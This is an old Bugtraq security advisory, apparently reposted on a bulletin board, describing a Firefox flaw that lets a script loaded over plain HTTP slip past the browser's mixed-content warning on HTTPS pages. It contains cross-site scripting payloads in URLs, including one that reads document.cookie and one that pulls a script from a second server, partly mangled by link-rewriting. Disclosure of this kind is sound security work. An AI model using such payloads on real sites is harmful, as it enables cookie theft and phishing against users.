Mozilla Firefox Insecure Element Stealth Injection Vulnerability

看板Bugtraq作者時間19年前 (2007/04/05 04:27), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
When user visits sites over HTTPS protocol he is informed by the Web Browser everytime the site tries to load unsecured (using HTTP protocol) element (script/iframe/object etc.). So for instance if we have XSS vulnerable site " rel="nofollow">https://server.com/vuln.php?id="><script>alert(document.cookie);</script> Everybrowser will execute it without any complains since they cannot know where the code comes from. But this example will cause a warning: https://server.com/vuln.php?id="><script src="" rel="nofollow">http://server2.com/xss.js"></script> Web Browser knows that we are trying to load something over unsecure protocol. However Mozilla Firefox will fail with the following example and the user will think that all the elements are "safe": ',10000)"" rel="nofollow">http://server2.com/xss.js></script>',10000)"</script> The "insecure element" will be added after Web Browser performs checking therefore allowing for instance phising attacks. Internet Explorer is not vulnerable to this issue. Other Web Browser weren't tested.
文章代碼(AID): #1650eo00 (Bugtraq)